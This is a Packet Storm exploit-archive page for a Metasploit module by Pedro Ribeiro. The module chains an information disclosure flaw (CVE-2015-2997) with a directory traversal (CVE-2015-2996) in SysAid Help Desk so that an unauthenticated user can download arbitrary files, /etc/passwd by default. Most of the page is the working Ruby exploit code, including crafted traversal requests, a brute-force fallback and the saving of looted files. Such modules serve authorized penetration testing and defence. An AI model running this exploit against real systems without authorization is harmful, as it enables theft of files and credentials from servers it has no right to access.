exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

SysAid Help Desk Arbitrary File Download

SysAid Help Desk Arbitrary File Download
Posted Aug 31, 2024
Authored by Pedro Ribeiro | Site metasploit.com

This Metasploit module exploits two vulnerabilities in SysAid Help Desk that allows an unauthenticated user to download arbitrary files from the system. First, an information disclosure vulnerability (CVE-2015-2997) is used to obtain the file system path, and then we abuse a directory traversal (CVE-2015-2996) to download the file. Note that there are some limitations on Windows, in that the information disclosure vulnerability doesnt work on a Windows platform, and we can only traverse the current drive (if you enter C:\afile.txt and the server is running on D:\ the file will not be downloaded). This Metasploit module has been tested with SysAid 14.4 on Windows and Linux.

tags | exploit, arbitrary, vulnerability, info disclosure
systems | linux, windows
advisories | CVE-2015-2996, CVE-2015-2997
SHA-256 | d2fb2969a8c58608b9b608d975acd9ca05c3df75f68ee7d1fffe92900e654527

SysAid Help Desk Arbitrary File Download

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(
update_info(
info,
'Name' => 'SysAid Help Desk Arbitrary File Download',
'Description' => %q{
This module exploits two vulnerabilities in SysAid Help Desk that allows
an unauthenticated user to download arbitrary files from the system. First, an
information disclosure vulnerability (CVE-2015-2997) is used to obtain the file
system path, and then we abuse a directory traversal (CVE-2015-2996) to download
the file. Note that there are some limitations on Windows, in that the information
disclosure vulnerability doesn't work on a Windows platform, and we can only
traverse the current drive (if you enter C:\afile.txt and the server is running
on D:\ the file will not be downloaded).

This module has been tested with SysAid 14.4 on Windows and Linux.
},
'Author' => [
'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2015-2996'],
['CVE', '2015-2997'],
['URL', 'https://seclists.org/fulldisclosure/2015/Jun/8'],
['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/sysaid-14.4-multiple-vulns.txt'],
],
'DisclosureDate' => '2015-06-03'
)
)

register_options(
[
OptPort.new('RPORT', [true, 'The target port', 8080]),
OptString.new('TARGETURI', [ true, 'SysAid path', '/sysaid']),
OptString.new('FILEPATH', [false, 'Path of the file to download (escape Windows paths with a back slash)', '/etc/passwd']),
]
)
end

def get_traversal_path
print_status('Trying to find out the traversal path...')
large_traversal = '../' * rand(15...30)
servlet_path = 'getAgentLogFile'

# We abuse getAgentLogFile to obtain the
res = send_request_cgi({
'uri' => normalize_uri(datastore['TARGETURI'], servlet_path),
'method' => 'POST',
'data' => Zlib::Deflate.deflate(Rex::Text.rand_text_alphanumeric(rand(100) + rand(300))),
'ctype' => 'application/octet-stream',
'vars_get' => {
'accountId' => large_traversal + Rex::Text.rand_text_alphanumeric(rand(8..17)),
'computerId' => Rex::Text.rand_text_alphanumeric(rand(8..17))
}
})

if res && res.code == 200 && res.body.to_s =~ %r{<H2>(.*)</H2>}
error_path = ::Regexp.last_match(1)
# Error_path is something like:
# /var/lib/tomcat7/webapps/sysaid/./WEB-INF/agentLogs/../../../../../../../../../../ajkdnjhdfn/1421678611732.zip
# This calculates how much traversal we need to do to get to the root.
position = error_path.index(large_traversal)
unless position.nil?
return '../' * (error_path[0, position].count('/') - 2)
end
end
end

def download_file(download_path)
return send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(datastore['TARGETURI'], 'getGfiUpgradeFile'),
'vars_get' => {
'fileName' => download_path
}
})
rescue Rex::ConnectionRefused
print_error('Could not connect.')
return
end

def run
# No point to continue if filepath is not specified
if datastore['FILEPATH'].nil? || datastore['FILEPATH'].empty?
fail_with(Failure::BadConfig, 'Please supply the path of the file you want to download.')
end

print_status("Downloading file #{datastore['FILEPATH']}")
if datastore['FILEPATH'] =~ /([A-Za-z]{1}):(\\*)(.*)/
file_path = ::Regexp.last_match(3)
else
file_path = datastore['FILEPATH']
end

traversal_path = get_traversal_path
if traversal_path.nil?
print_error('Could not get traversal path, using bruteforce to download the file')
count = 1
while count < 15
res = download_file(('../' * count) + file_path)
if res && res.code == 200 && res.body.to_s.bytesize != 0
break
end

count += 1
end
else
res = download_file(traversal_path[0, traversal_path.length - 1] + file_path)
end

if res && res.code == 200
if res.body.to_s.bytesize == 0
fail_with(Failure::NoAccess, "#{peer} - 0 bytes returned, file does not exist or it is empty.")
else
vprint_line(res.body.to_s)
fname = File.basename(datastore['FILEPATH'])

path = store_loot(
'sysaid.http',
'application/octet-stream',
datastore['RHOST'],
res.body,
fname
)
print_good("File saved in: #{path}")
end
else
fail_with(Failure::Unknown, "#{peer} - Failed to download file.")
end
end
end
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close